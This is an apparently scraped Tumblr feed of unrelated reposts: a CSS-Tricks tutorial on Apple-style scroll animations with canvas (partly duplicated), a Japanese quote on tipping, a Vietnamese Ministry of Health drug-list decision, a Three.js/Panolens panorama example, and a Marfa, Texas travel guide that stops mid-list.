 body {   background: #000;   height: 500vh; } 
 canvas {   position: fixed;   left: 50%;   top: 50%;   max-height: 100vh;   max-width: 100vw;   transform: translate(-50%, -50%); }
Right now, we are able to scroll down the page (even though the content does not exceed the viewport height) and our <canvas> stays at the top of the viewport. That’s all the HTML and CSS we need.
Let’s move on to loading the images.
Fetching the correct images
Since we’ll be working with an image sequence (again, like a flip book), we’ll assume the file names are numbered sequentially in ascending order (i.e. 0001.jpg, 0002.jpg, 0003.jpg, etc.) in the same directory.
We’ll write a function that returns the file path with the number of the image file we want, based off of the user’s scroll position.
const currentFrame = index => (   `https://www.apple.com/105/media/us/airpods-pro/2019/1299e2f5_9206_4470_b28e_08307a42f19b/anim/sequence/large/01-hero-lightpass/${index.toString().padStart(4, '0')}.jpg` )
Since the image number is an integer, we’ll need to turn it in to a string and use padStart(4, '0') to prepend zeros in front of our index until we reach four digits to match our file names. So, for example, passing 1 into this function will return 0001.
That gives us a way to handle image paths. Here’s the first image in the sequence drawn on the <canvas> element:
CodePen Embed Fallback
As you can see, the first image is on the page. At this point, it’s just a static file. What we want is to update it based on the user’s scroll position. And we don’t merely want to load one image file and then swap it out by loading another image file. We want to draw the images on the <canvas> and update the drawing with the next image in the sequence (but we’ll get to that in just a bit).
We already made the function to generate the image filepath based on the number we pass into it so what we need to do now is track the user’s scroll position and determine the corresponding image frame for that scroll position.
Connecting images to the user’s scroll progress
To know which number we need to pass (and thus which image to load) in the sequence, we need to calculate the user’s scroll progress. We’ll make an event listener to track that and handle some math to calculate which image to load.
We need to know:
Where scrolling starts and ends
The user’s scroll progress (i.e. a percentage of how far the user is down the page)
The image that corresponds to the user’s scroll progress
We’ll use scrollTop to get the vertical scroll position of the element, which in our case happens to be the top of the document. That will serve as the starting point value. We’ll get the end (or maximum) value by subtracting the window height from the document scroll height. From there, we’ll divide the scrollTop value by the maximum value the user can scroll down, which gives us the user’s scroll progress.
Then we need to turn that scroll progress into an index number that corresponds with the image numbering sequence for us to return the correct image for that position. We can do this by multiplying the progress number by the number of frames (images) we have. We’ll use Math.floor() to round that number down and wrap it in Math.min() with our maximum frame count so it never exceeds the total number of frames.
window.addEventListener('scroll', () => {     const scrollTop = html.scrollTop;   const maxScrollTop = html.scrollHeight - window.innerHeight;   const scrollFraction = scrollTop / maxScrollTop;   const frameIndex = Math.min(     frameCount - 1,     Math.floor(scrollFraction * frameCount)   ); });
Updating <canvas> with the correct image
We now know which image we need to draw as the user’s scroll progress changes. This is where the magic of  <canvas> comes into play. <canvas> has many cool features for building everything from games and animations to design mockup generators and everything in between!
One of those features is a method called requestAnimationFrame that works with the browser to update <canvas> in a way we couldn’t do if we were working with straight image files instead. This is why I went with a <canvas> approach instead of, say, an <img> element or a <div> with a background image.
requestAnimationFrame will match the browser refresh rate and enable hardware acceleration by using WebGL to render it using the device’s video card or integrated graphics. In other words, we’ll get super smooth transitions between frames — no image flashes!
Let’s call this function in our scroll event listener to swap images as the user scrolls up or down the page. requestAnimationFrame takes a callback argument, so we’ll pass a function that will update the image source and draw the new image on the <canvas>:
requestAnimationFrame(() => updateImage(frameIndex + 1))
We’re bumping up the frameIndex by 1 because, while the image sequence starts at 0001.jpg, our scroll progress calculation starts actually starts at 0. This ensures that the two values are always aligned.
The callback function we pass to update the image looks like this:
const updateImage = index => { img.src = currentFrame(index); context.drawImage(img, 0, 0); }
We pass the frameIndex into the function. That sets the image source with the next image in the sequence, which is drawn on our <canvas> element.
Even better with image preloading
We’re technically done at this point. But, come on, we can do better! For example, scrolling quickly results in a little lag between image frames. That’s because every new image sends off a new network request, requiring a new download.
We should try preloading the images new network requests. That way, each frame is already downloaded, making the transitions that much faster, and the animation that much smoother!
All we’ve gotta do is loop through the entire sequence of images and load ‘em up:
const frameCount = 148; 
 const preloadImages = () => {   for (let i = 1; i < frameCount; i++) {     const img = new Image();     img.src = currentFrame(i);   } }; 
 preloadImages();
Demo!
CodePen Embed Fallback
A quick note on performance
While this effect is pretty slick, it’s also a lot of images. 148 to be exact.
No matter much we optimize the images, or how speedy the CDN is that serves them, loading hundreds of images will always result in a bloated page. Let’s say we have multiple instances of this on the same page. We might get performance stats like this:
Tumblr media
That might be fine for a high-speed internet connection without tight data caps, but we can’t say the same for users without such luxuries. It’s a tricky balance to strike, but we have to be mindful of everyone’s experience — and how our decisions affect them.
A few things we can do to help strike that balance include:
Loading a single fallback image instead of the entire image sequence
Creating sequences that use smaller image files for certain devices
Allowing the user to enable the sequence, perhaps with a button that starts and stops the sequence
Apple employs the first option. If you load the AirPods Pro page on a mobile device connected to a slow 3G connection and, hey, the performance stats start to look a whole lot better:
Tumblr media
Yeah, it’s still a heavy page. But it’s a lot lighter than what we’d get without any performance considerations at all. That’s how Apple is able to get get so many complex sequences onto a single page.
Further reading
If you are interested in how these image sequences are generated, a good place to start is the Lottie library by AirBnB. The docs take you through the basics of generating animations with After Effects while providing an easy way to include them in projects.
The post Let’s Make One of Those Fancy Scrolling Animations Used on Apple Product Pages appeared first on CSS-Tricks.
Let’s Make One of Those Fancy Scrolling Animations Used on Apple Product Pages published first on https://deskbysnafu.tumblr.com/
0 notes
recruitmentdubai · 5 years ago
Text
Let’s Make One of Those Fancy Scrolling Animations Used on Apple Product Pages
Apple is well-known for the sleek animations on their product pages. For example, as you scroll down the page products may slide into view, MacBooks fold open and iPhones spin, all while showing off the hardware, demonstrating the software and telling interactive stories of how the products are used.
Just check out this video of the mobile web experience for the iPad Pro:
Source: Twitter
A lot of the effects that you see there aren’t created in just HTML and CSS. What then, you ask? Well, it can be a little hard to figure out. Even using the browser’s DevTools won’t always reveal the answer, as it often can’t see past a <canvas> element.
Let’s take an in-depth look at one of these effects to see how it’s made so you can recreate some of these magical effects in our own projects. Specifically, let’s replicate the AirPods Pro product page and the shifting light effect in the hero image.
The basic concept
The idea is to create an animation just like a sequence of images in rapid succession. You know, like a flip book! No complex WebGL scenes or advanced JavaScript libraries are needed.
By synchronizing each frame to the user’s scroll position, we can play the animation as the user scrolls down (or back up) the page.
Start with the markup and styles
The HTML and CSS for this effect is very easy as the magic happens inside the <canvas> element which we control with JavaScript by giving it an ID.
In CSS, we’ll give our document a height of 100vh and make our <body> 5⨉ taller than that to give ourselves the necessary scroll length to make this work. We’ll also match the background color of the document with the background color of our images.
The last thing we’ll do is position the <canvas>, center it, and limit the max-width and height so it does not exceed the dimensions of the viewport.
html {   height: 100vh; } 
 body {   background: #000;   height: 500vh; } 
 canvas {   position: fixed;   left: 50%;   top: 50%;   max-height: 100vh;   max-width: 100vw;   transform: translate(-50%, -50%); }
Right now, we are able to scroll down the page (even though the content does not exceed the viewport height) and our <canvas> stays at the top of the viewport. That’s all the HTML and CSS we need.
Let’s move on to loading the images.
Fetching the correct images
Since we’ll be working with an image sequence (again, like a flip book), we’ll assume the file names are numbered sequentially in ascending order (i.e. 0001.jpg, 0002.jpg, 0003.jpg, etc.) in the same directory.
We’ll write a function that returns the file path with the number of the image file we want, based off of the user’s scroll position.
const currentFrame = index => (   `https://www.apple.com/105/media/us/airpods-pro/2019/1299e2f5_9206_4470_b28e_08307a42f19b/anim/sequence/large/01-hero-lightpass/${index.toString().padStart(4, '0')}.jpg` )
Since the image number is an integer, we’ll need to turn it in to a string and use padStart(4, '0') to prepend zeros in front of our index until we reach four digits to match our file names. So, for example, passing 1 into this function will return 0001.
That gives us a way to handle image paths. Here’s the first image in the sequence drawn on the <canvas> element:
CodePen Embed Fallback
As you can see, the first image is on the page. At this point, it’s just a static file. What we want is to update it based on the user’s scroll position. And we don’t merely want to load one image file and then swap it out by loading another image file. We want to draw the images on the <canvas> and update the drawing with the next image in the sequence (but we’ll get to that in just a bit).
We already made the function to generate the image filepath based on the number we pass into it so what we need to do now is track the user’s scroll position and determine the corresponding image frame for that scroll position.
Connecting images to the user’s scroll progress
To know which number we need to pass (and thus which image to load) in the sequence, we need to calculate the user’s scroll progress. We’ll make an event listener to track that and handle some math to calculate which image to load.
We need to know:
Where scrolling starts and ends
The user’s scroll progress (i.e. a percentage of how far the user is down the page)
The image that corresponds to the user’s scroll progress
We’ll use scrollTop to get the vertical scroll position of the element, which in our case happens to be the top of the document. That will serve as the starting point value. We’ll get the end (or maximum) value by subtracting the window height from the document scroll height. From there, we’ll divide the scrollTop value by the maximum value the user can scroll down, which gives us the user’s scroll progress.
Then we need to turn that scroll progress into an index number that corresponds with the image numbering sequence for us to return the correct image for that position. We can do this by multiplying the progress number by the number of frames (images) we have. We’ll use Math.floor() to round that number down and wrap it in Math.min() with our maximum frame count so it never exceeds the total number of frames.
window.addEventListener('scroll', () => {     const scrollTop = html.scrollTop;   const maxScrollTop = html.scrollHeight - window.innerHeight;   const scrollFraction = scrollTop / maxScrollTop;   const frameIndex = Math.min(     frameCount - 1,     Math.floor(scrollFraction * frameCount)   ); });
Updating <canvas> with the correct image
We now know which image we need to draw as the user’s scroll progress changes. This is where the magic of  <canvas> comes into play. <canvas> has many cool features for building everything from games and animations to design mockup generators and everything in between!
One of those features is a method called requestAnimationFrame that works with the browser to update <canvas> in a way we couldn’t do if we were working with straight image files instead. This is why I went with a <canvas> approach instead of, say, an <img> element or a <div> with a background image.
requestAnimationFrame will match the browser refresh rate and enable hardware acceleration by using WebGL to render it using the device’s video card or integrated graphics. In other words, we’ll get super smooth transitions between frames — no image flashes!
Let’s call this function in our scroll event listener to swap images as the user scrolls up or down the page. requestAnimationFrame takes a callback argument, so we’ll pass a function that will update the image source and draw the new image on the <canvas>:
requestAnimationFrame(() => updateImage(frameIndex + 1))
We’re bumping up the frameIndex by 1 because, while the image sequence starts at 0001.jpg, our scroll progress calculation starts actually starts at 0. This ensures that the two values are always aligned.
The callback function we pass to update the image looks like this:
const updateImage = index => { img.src = currentFrame(index); context.drawImage(img, 0, 0); }
We pass the frameIndex into the function. That sets the image source with the next image in the sequence, which is drawn on our <canvas> element.
Even better with image preloading
We’re technically done at this point. But, come on, we can do better! For example, scrolling quickly results in a little lag between image frames. That’s because every new image sends off a new network request, requiring a new download.
We should try preloading the images new network requests. That way, each frame is already downloaded, making the transitions that much faster, and the animation that much smoother!
All we’ve gotta do is loop through the entire sequence of images and load ‘em up:
const frameCount = 148; 
 const preloadImages = () => {   for (let i = 1; i < frameCount; i++) {     const img = new Image();     img.src = currentFrame(i);   } }; 
 preloadImages();
Demo!
CodePen Embed Fallback
A quick note on performance
While this effect is pretty slick, it’s also a lot of images. 148 to be exact.
No matter much we optimize the images, or how speedy the CDN is that serves them, loading hundreds of images will always result in a bloated page. Let’s say we have multiple instances of this on the same page. We might get performance stats like this:
Tumblr media
That might be fine for a high-speed internet connection without tight data caps, but we can’t say the same for users without such luxuries. It’s a tricky balance to strike, but we have to be mindful of everyone’s experience — and how our decisions affect them.
A few things we can do to help strike that balance include:
Loading a single fallback image instead of the entire image sequence
Creating sequences that use smaller image files for certain devices
Allowing the user to enable the sequence, perhaps with a button that starts and stops the sequence
Apple employs the first option. If you load the AirPods Pro page on a mobile device connected to a slow 3G connection and, hey, the performance stats start to look a whole lot better:
Tumblr media
Yeah, it’s still a heavy page. But it’s a lot lighter than what we’d get without any performance considerations at all. That’s how Apple is able to get get so many complex sequences onto a single page.
Further reading
If you are interested in how these image sequences are generated, a good place to start is the Lottie library by AirBnB. The docs take you through the basics of generating animations with After Effects while providing an easy way to include them in projects.
The post Let’s Make One of Those Fancy Scrolling Animations Used on Apple Product Pages appeared first on CSS-Tricks.
source https://css-tricks.com/lets-make-one-of-those-fancy-scrolling-animations-used-on-apple-product-pages/
from WordPress https://ift.tt/2WVlcvM via IFTTT
0 notes
plasticdreams · 8 years ago
Quote
105: 名無しさん 2016/12/30(金) 21:08:47.32 ID:7HP1OeNi0 日本にチップ制度入れれば解決 サービス業の給与が安過ぎる タイとかベトナムとかチップ制度が無かったけど観光客が増えたからチップ制度になってるし日本もそうしろ   139: 名無しさん 2016/12/30(金) 21:14:41.46 ID:Tmn+FF8Y0 >>105 良いサービスは金で買うっていう文化がないもんな。 海外行ってこれがスタンダードなんだと思ったよ。 安いのに三ツ星レベルを日本全国タダでやってる。 そりゃ生産性低くなるわ。
「お客様には伝えないでください」 バイトに対する理不尽な張り紙が話題に
98 notes · View notes
hosodangkynhanhieu · 6 years ago
Text
Quyết định 4043/QĐ-BYT năm 2019 đính chính về nồng độ/hàm lượng và đơn vị tính của 02 thuốc và loại bỏ 11 thuốc khỏi Danh mục thuốc sản xuất trong nước đáp ứng yêu cầu về điều trị, giá thuốc và khả năng cung cấp tại Phụ lục kèm theo Thông tư 03/2019/TT-BYT Danh mục thuốc sản xuất trong nước đáp ứng yêu cầu về điều trị, giá thuốc và khả năng cung cấp do Bộ trưởng Bộ Y tế ban hành
X
CÁC NỘI DUNG ĐƯỢC SỬA ĐỔI, HƯỚNG DẪN
Các nội dung của VB này được VB khác thay đổi, hướng dẫn sẽ được làm nổi bật bằng các màu sắc:
     : Sửa đổi, thay thế, hủy bỏ
     : Hướng dẫn
Click vào nội dung được bôi màu      để xem chi tiết.
Số hiệu: 4043/QĐ-BYT Loại văn bản: Quyết định Nơi ban hành: Bộ Y tế Người ký: Trương Quốc Cường Ngày ban hành: 06/09/2019 Ngày hiệu lực: Đã biết Ngày công báo: Đang cập nhật Số công báo: Đang cập nhật Tình trạng: Đã biết
BỘ Y TẾ ——-
CỘNG HÒA XÃ HỘI CHỦ NGHĨA VIỆT NAM Độc lập – Tự do – Hạnh phúc —————
Số: 4043/QĐ-BYT
Hà Nội, ngày 06 tháng 9 năm 2019
  QUYẾT ĐỊNH
ĐÍNH CHÍNH VỀ NỒNG ĐỘ/HÀM LƯỢNG, ĐƠN VỊ TÍNH CỦA 02 THUỐC VÀ LOẠI BỎ 11 THUỐC KHỎI DANH MỤC THUỐC SẢN XUẤT TRONG NƯỚC ĐÁP ỨNG YÊU CẦU VỀ ĐIỀU TRỊ, GIÁ THUỐC VÀ KHẢ NĂNG CUNG CẤP TẠI PHỤ LỤC BAN HÀNH KÈM THEO THÔNG TƯ SỐ 03/2019/TT-BYT NGÀY 28 THÁNG 3 NĂM 2019 CỦA BỘ TRƯỞNG BỘ Y TẾ BAN HÀNH DANH MỤC THUỐC SẢN XUẤT TRONG NƯỚC ĐÁP ỨNG YÊU CẦU VỀ ĐỀU TRỊ, GIÁ THUỐC VÀ KHẢ NĂNG CUNG CẤP
BỘ TRƯỞNG BỘ Y TẾ
Căn cứ Luật Dược số 105/2016/QH13 ngày 06 tháng 4 năm 2016;
Căn cứ Luật Đấu thầu số 43/2013/QH13 ngày 26 tháng 11 năm 2013;
Căn cứ Nghị định số 75/2017/NĐ-CP ngày 20 tháng 6 năm 2017 của Chính phủ quy định chức năng, nhiệm vụ, quyền hạn và cơ cấu tổ chức của Bộ Y tế;
Căn cứ Nghị định số 54/2017/NĐ-CP ngày 08 tháng 5 năm 2017 của Chính phủ quy định chi tiết một số điều và biện pháp thi hành Luật Dược;
Căn cứ Nghị định số 63/2014/NĐ-CP ngày 26 tháng 6 năm 2014 của Chính phủ quy định chi tiết thi hành một số điều của Luật Đấu thầu về lựa chọn nhà thầu;
Căn cứ Thông tư số 03/2019/TT-BYT ngày 28 tháng 3 năm 2019 của Bộ trưởng Bộ Y tế ban hành danh mục thuốc sản xuất trong nước đáp ứng yêu cầu về điều trị, giá thuốc và khả năng cung cấp’
Xét đề nghị của Cục trưởng Cục Quản lý Dược,
QUYẾT ĐỊNH
Điều 1. Ban hành kèm theo Quyết định này 11 thuốc loại bỏ khỏi Danh mục thuốc sản xuất trong nước đáp ứng yêu cầu về điều trị, giá thuốc và khả năng cung cấp tại Phụ lục ban hành kèm theo Thông tư số 03/2019/TT-BYT ngày 28 tháng 3 năm 2019 của Bộ trưởng Bộ Y tế ban hành Danh mục thuốc sản xuất trong nước đáp ứng yêu cầu về điều trị, giá thuốc và khả năng cung cấp.
Điều 2. Đính chính về nồng độ/hàm lượng và đơn vị tính của 02 thuốc tại Danh mục thuốc sản xuất trong nước đáp ứng yêu cầu về điều trị, giá thuốc và khả năng cung cấp tại Phụ lục ban hành kèm theo Thông tư số 03/2019/TT-BYT ngày 28 tháng 3 năm 2019 của Bộ trưởng Bộ Y tế ban hành Danh mục thuốc sản xuất trong nước đáp ứng yêu cầu về điều trị, giá thuốc và khả năng cung cấp, cụ thể như sau:
1. Nồng độ hàm lượng của thuốc số thứ tự 166 là “Cefpodoxim 100mg, đường dùng: uống, đơn vị tính: chai/lọ/ống/túi” được đính chính thành “Cefpodoxim 100mg/10ml đường dùng: uống, đơn vị tính: chai/lọ/ống/túi”.
2. Đơn vị tính của thuốc số thứ tự 466 là “Paracetamol 80mg, đường dùng: uống, đơn vị tính: viên” được đính chính thành “Paracetamol 80mg, đường dùng: uống, đơn vị tính: gói”.
Điều 3. Quyết định này có hiệu lực kể từ ngày ký, ban hành.
Điều 4. Cục trưởng Cục Quản lý Dược, Vụ trưởng Vụ Kế hoạch – Tài chính, Chánh Văn phòng Bộ, Thủ trưởng các đơn vị liên quan chịu trách nhiệm thi hành Quyết định này. Trong quá trình thực hiện, nếu có khó khăn vướng mắc, đề nghị các cơ quan, tổ chức, cá nhân kịp thời phản ánh về Bộ Y tế (Cục Quản lý Dược) để xem xét, giải quyết./.
  Nơi nhận: – Như Điều 4; – Văn phòng Chính phủ (Vụ KGVX, Công báo, Cổng TTĐT CP); – Bộ trưởng (để b/c); – Các Thứ trưởng BYT; – Các Bộ, cơ quan ngang Bộ, cơ quan thuộc CP; – UBND các tỉnh, thành phố trực thuộc TW; – Sở Tài chính, Sở Y tế các tỉnh, TP trực thuộc TW; – Phòng Thương mại và Công nghiệp Việt Nam; – Các đơn vị thuộc, trực thuộc Bộ Y tế; – Bảo hiểm xã hội Việt Nam; – Y tế ngành (QP, CA, BCVT, GTVT): – Hiệp hội DN Dược Việt Nam; – Hiệp hội Bệnh viện tư nhân Việt Nam; – Tổng Công ty Dược Việt Nam; – Cổng Thông tin điện tử Bộ Y tế; – Trang Thông tin điện tử Cục QLD; – Lưu: VT, QLD(02), PC(02).
KT. BỘ TRƯỞNG THỨ TRƯỞNG
Trương Quốc Cường
  DANH MỤC
CÁC THUỐC LOẠI KHỎI DANH MỤC THUỐC TẠI PHỤ LỤC DANH MỤC THUỐC SẢN XUẤT TRONG NƯỚC ĐÁP ỨNG YÊU CẦU VỀ ĐIỀU TRỊ, GIÁ THUỐC VÀ KHẢ NĂNG CUNG CẤP BAN HÀNH KÈM THEO THÔNG TƯ SỐ 03/2019/TT-BYT NGÀY 28/3/2019 CỦA BỘ TRƯỞNG BỘ Y TẾ. (Ban hành kèm theo Quyết định số 4043/QĐ-BYT ngày 06 tháng 9 năm 2019 của Bộ trưởng Bộ Y tế)
STT
STT tại Thông tư số 03/2019/TT-BYT
Hoạt chất
Nồng độ/ Hàm lượng
Đường dùng
ĐVT
Tiêu chí kỹ thuật
1
268
Ertapenem
1g
Tiêm/truyền
Chai/lọ/ống/túi
WHO-GMP
2
279
Etoposid
100mg
Uống
Viên
WHO-GMP
3
296
Fluorouracil
500mg
Tiêm/truyền
Chai/lọ/ống/túi
WHO-GMP
4
362
Leflunomid
10mg
Uống
Viên
WHO-GMP
5
422
Metronidazol + Cloramphenicol + Nystatin
200mg + 80mg + 100.000IU
Đặt âm đạo
Viên
WHO-GMP
6
487
Pefloxacin
400mg
Tiêm/truyền
Chai/lọ/ống/túi
WHO-GMP
7
494
Phenylephrin hydroclorid + Loratadin
5mg + 5mg
Uống
Viên
WHO-GMP
8
495
Piperacilin
1g
Tiêm/truyền
Chai/lọ/ống/túi
WHO-GMP
9
516
Progesteron
200mg
Uống
Viên
WHO-GMP
10
587
Thalidomid
100mg
Uống
Viên
WHO-GMP
11
615
Vitamin A + Vitamin D3
2500IU + 250IU
Uống
Viên
WHO-GMP
  Văn bản này chưa cập nhật nội dung Tiếng Anh
Quyết định 4043/QĐ-BYT năm 2019 đính chính về nồng độ/hàm lượng và đơn vị tính của 02 thuốc và loại bỏ 11 thuốc khỏi Danh mục thuốc sản xuất trong nước đáp ứng yêu cầu về điều trị, giá thuốc và khả năng cung cấp tại Phụ lục kèm theo Thông tư 03/2019/TT-BYT Danh mục thuốc sản xuất trong nước đáp ứng yêu cầu về điều trị, giá thuốc và khả năng cung cấp do Bộ trưởng Bộ Y tế ban hành
16
Quyết định 4043/QĐ-BYT 2019 đính chính nồng độ 02 thuốc loại bỏ 11 …
Chọn văn bản so sánh thay thế:
Tumblr media Tumblr media
CÁC NỘI DUNG SỬA ĐỔI, HƯỚNG DẪN
NỘI DUNG
Văn bản bị thay thế
Văn bản thay thế
Tumblr media
Chú thích:
Rà chuột vào nội dụng văn bản để sử dụng.
= Nội dung thay thế tương ứng;
= Không có nội dung thay thế tương ứng;
= Không có nội dung bị thay thế tương ứng;
= Nội dung được sửa đổi, bổ sung.
  Click trái để xem cụ thể từng nội dung cần so sánh và cố định bảng so sánh.
Click phải để xem những nội dung sửa đổi, bổ sung.
Double click để xem tất cả nội dung không có thay thế tương ứng.
Tắt so sánh [X] để trở về trạng thái rà chuột ban đầu.
Địa chỉ: 17 Nguyễn Gia Thiều, P.6, Q.3, TP.HCM Điện thoại: (028) 3930 3279 (06 lines) E-mail: [email protected]
Tumblr media
IP: 103.221.221.8
Xin chân thành cảm ơn Thành viên  đã sử dụng www.ThuVienPhapLuat.vn
Hiện tại THƯ VIỆN PHÁP LUẬT phiên bản hoàn toàn mới cung cấp nhiều tiện ích vượt trội:
Tra cứu dễ dàng bởi thanh công cụ tra cúu hoàn toàn mới
Tra cứu toàn bộ Văn bản Gốc;
Tra cứu hơn 280.000 văn bản Pháp Luật;
Ban Thư Ký Luật sẽ Thông báo tóm lược những Văn bản Quý khách cần, qua Email hoặc SMS, ngay khi nó vừa ban hành, hoặc vừa có hiệu lực;
Hỗ Trợ tư vấn Pháp lý sơ bộ miễn phí qua các hình thức: Điện Thoại, email.
Khi áp dụng văn bản, bạn sẽ được biết: • Ngày áp dụng của từng văn bản. • Tình trạng hiệu lực của từng văn bản.
Đặc biệt hỗ trợ tư vấn pháp lý sơ bộ miễn phí qua 3 hình thức: điện thoại, chat và email bởi bộ phận chuyên viên pháp lý.
Tumblr media Tumblr media
Hoài ThươngHỗ trợ trực tuyến
Chào mừng anh (chị) đến với THƯ VIỆN PHÁP LUẬT
Hãy để chúng tôi hỗ trợ thông tin đến anh (chị)!
Xin chân thành cảm ơn Thành viên  đã sử dụng www.ThuVienPhapLuat.vn
The post Quyết định 4043/QĐ-BYT năm 2019 đính chính về nồng độ/hàm lượng và đơn vị tính của 02 thuốc và loại bỏ 11 thuốc khỏi Danh mục thuốc sản xuất trong nước đáp ứng yêu cầu về điều trị, giá thuốc và khả năng cung cấp tại Phụ lục kèm theo Thông tư 03/2019/TT-BYT Danh mục thuốc sản xuất trong nước đáp ứng yêu cầu về điều trị, giá thuốc và khả năng cung cấp do Bộ trưởng Bộ Y tế ban hành appeared first on Hồ Sơ Đăng Ký Nhãn Hiệu.
https://ift.tt/2mIGEob
0 notes
awsexchage · 6 years ago
Photo
Tumblr media
Three.jsとPanolensで360パノラマの作成方法 https://ift.tt/2ZyKZrW
Tumblr media
はじめに
こんにちは streampack チームのメディです。 https://cloudpack.jp/service/option/streampack.html
Copyrights・ コピーライト
Copyleft picture https://pixabay.com/photos/winter-panorama-mountains-snow-2383930/
Objective・目的
Learning how to create a 360 panorama with info markers. ツールチップ付きの360パノラマの簡単な例を学ぶこと。
Tools・ツール
Panolens
Threejs
Implementation ・ 実装
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <style> html, body { width: 100%; height: 100%; overflow: hidden; margin: 0; } #container { width: 100%; height: 100%; } </style> </head> <body> <script src="//cdnjs.cloudflare.com/ajax/libs/three.js/105/three.js"></script> <script src="//cdn.jsdelivr.net/npm/[email protected]/build/panolens.min.js"></script> <div id="container"></div> <script> var panorama, viewer, container, infospot, infospot2; container = document.querySelector('#container'); panorama = new PANOLENS.ImagePanorama('https://i.imgur.com/wTCPouq.jpg'); infospot = new PANOLENS.Infospot(); infospot.position.set( 1000, 100, -2000 ); infospot.addHoverText( '千葉県' ); infospot2 = new PANOLENS.Infospot(); infospot2.position.set( 1000, 100, 2000 ); infospot2.addHoverText( '神奈川県' ); panorama.add(infospot , infospot2); viewer = new PANOLENS.Viewer({ container: container }); viewer.add(panorama); </script> </body> </html>
demo ・ デモ
https://jsfiddle.net/gzxsefyq/
情報元
https://github.com/mrdoob/three.js/ https://pchen66.github.io/Panolens/
元記事はこちら
「Three.jsとPanolensで360パノラマの作成方法」
August 27, 2019 at 02:00PM
0 notes
svetlanawagner-blog · 6 years ago
Photo
Tumblr media
As I entered the bright white building, I heard the quiet whirring of small machines. I weaved through the museum doing my best to interpret and experience the art but couldn’t shake a feeling of familiarity. Then it hit me, I’ve seen this same artist before in NYC! Who would have guessed we would find a slice of the big apple in the small town of Marfa.
A big thank you to Travel Texas for hosting our trip. All opinions are always our own. This post may contain affiliate links, where we receive a small commission on sales of the products that are linked at no additional cost to you. Read our full disclosure for more info. Thank you for supporting the brands that make Local Adventurer possible.
Last Updated: July 8, 2019
25 Coolest Things to Do in Marfa TX
We ended our West Texas Road Trip in Marfa. Before visiting, we knew very little of the area other than hearing about the artsy community and seeing Prada Marfa and El Cosmico on instagram.
Marfa truly surprised us and felt like an anomoly. It’s quaint and charming and has small town vibes, but it’s also is completely different from any small town we’ve previously seen.
We found it hard to describe, and it almost felt like the twilight zone. We expected to find eclectic desert art and instead found an art scene as sophisticated as NYC. Sometimes it felt like a small town in West Texas, and other times it felt like a neighborhood in Brooklyn.
If you’re planning a trip out to Marfa, we’ve put together a guide to help you plan your trip.
Content Menu
Title of Subsection
photo: 
What You Need to Know Before You Visit Marfa
Like a lot of the small towns in West Texas, hours are limited. Visit between Thursday to Sunday for the best experience, but even then there’s no guarantee that all businesses will be open.
Be flexible with your schedule. Even with posted hours, some stores and restaurants may close. Some even run out of food and close once the food is out. They’ve adopted a siesta mentality and close whenever they feel like it.
The closest major airport is in El Paso (about 3 hours away). Take advantage of your location and see other surrounding sites in West Texas. Here is our road trip guide.
Renting a car is the best way to get around town. When we talked to locals and asked about Uber, they said there are only 1-2 drivers locally.
Talk to locals to find out what else is going on around town. We heard about a free concert from a bartender which was the perfect way to end the night.
Cell phone coverage can be spotty. We have T-mobile and it worked in most cases but as soon as we were out of the main area, we lost signal.
If you plan on visiting during a holiday weekend, book early. This has become a popular destination.
Marfa is in a desert climate. it gets hot during the day but chilly at night. Have layers ready. During the winter, it can snow and gets dangerous to drive.
1. Marfa Mystery Lights
US-90, Marfa, TX 79843, map
The Marfa Lights have mystified people for generations. The glowing orbs appear in the desert outside Marfa and have been described as white, blue, yellow, and red. The first mention of the lights comes from Robert Reed Ellison in 1883 and you can see them from an official viewing platform, although you can’t predict when they will appear.
2. Ballroom Marfa
108 E San Antonio St, Marfa, TX 79843, map
Ballroom Marfa is one of the iconic contemporary art spaces in Marfa. They curate art from well-known and emerging artists from all over the world. During our visit, we saw an artist that was also on display at MOMA PS1 while we lived in NYC. They also host music acts in their space. Visit their site for their upcoming schedule.
Hours: Wednesday to Saturday 10am-6pm, Sunday 10am-3pm
More: 25 Fun Things to do Indoors in NYC
3. Judd Foundation
104 S Highland Ave, Marfa, TX 79843, map
Donald Judd is attributed with bringing the NYC art scene to Marfa, Texas. The foundation maintains and preserves Judd’s pieces, workspaces, libraries, and archives. You can take a guided to tour to visit different properties in Marfa.
4. Chinati Foundation
1 Cavalry Row,Marfa,TX,79843, Marfa, TX 79843, map
The Chinati Foundation is a contemporary art museum founded by Donald Judd. They specialize in large-scale installations spread over the 340 acres of land where Fort D.A. Russell used to be. Public tours are a great way to get more insight into the pieces or you can explore on your own.
Hours: Wednesday to Sunday 9am-5pm
5. Ayn Foundation
107 – 109 Highland St, Marfa, TX 79843, map
The Ayn Foundation focuses on large-scale products by major international artists. It currently includes Andy Warhol’s The Last Supper and Maria Zerres’ September Eleven.
6. Marfa Book Company
105 S Highland Ave, Marfa, TX 79843, map
MBCo has been around for almost twenty years and functions as a bookstore, publisher, and performance space. Stop by to check out their unique selection of books or visit during their talks, readings, or performances.
7. Freda
207 S Highland Ave, Marfa, TX 79843, map
This shop is a local favorite where you’ll find jewelry, found objects, vintage clothing and more. A record playing in the corner sets the mood while you shop.
8. Cobra Rock Boot Company
107 S Dean St, Marfa, TX 79843, map
If you love handcrafted artisan products, then you need to see the boots made by Cobra Rock. As you walk in, you are immediately greeted by the smell of leather. You can browse through items by other small independent designers, see the machines they use to make the boots, or order your very own.
9. Moonlight Gemstones
1001 W San Antonio St, Marfa, TX 79843, map
If you’re looking to pick up a gift our souvenier, check out Moonlight Gemstone. They specialize in West Texas Agates but carry a wide variety of choices.  They also do custom gemstone cutting. and create custom silver jewelry.
10. Wrong Store
110 W Dallas St, Marfa, TX 79843, map
Awarded the Most Beautiful Independent Store in Texas by Architectural Digest, this shop is an eclectic collection of local items, carved wooden pieces, and artsy wares. 
11. Marfa Brands
213 S Dean St, Marfa, TX 79843, map
What started as a hobby, Marfa Brands makes soaps with fans from all over the world. Hand pouring 150 bars at a time, you’ll find combinations like Rosemary Peppermint, Bergamot Grapefruit with Lemon Peel and Earl Grey Tea, and Oak Moss with Kelp and Sea Salt.
12. Prada Marfa
14880 US-90, Valentine, TX 79854, map
This is probably the most popular photo of Marfa, even though it’s not technically in Marfa. The permanent installation was created in 2005 and actually houses items from the fall/winter 2005 collection.
13. Tiny Target
US-90, Alpine, TX 79830, map
In early 2016, an anonymous artist painted a bullseye and the word Target on an old railroad structure. This is also outside of Marfa (about 45 mins east), but is often associated with Marfa.
14. Marfa Museum Thrift Store
610 W San Antonio St, Marfa, TX 79843, map
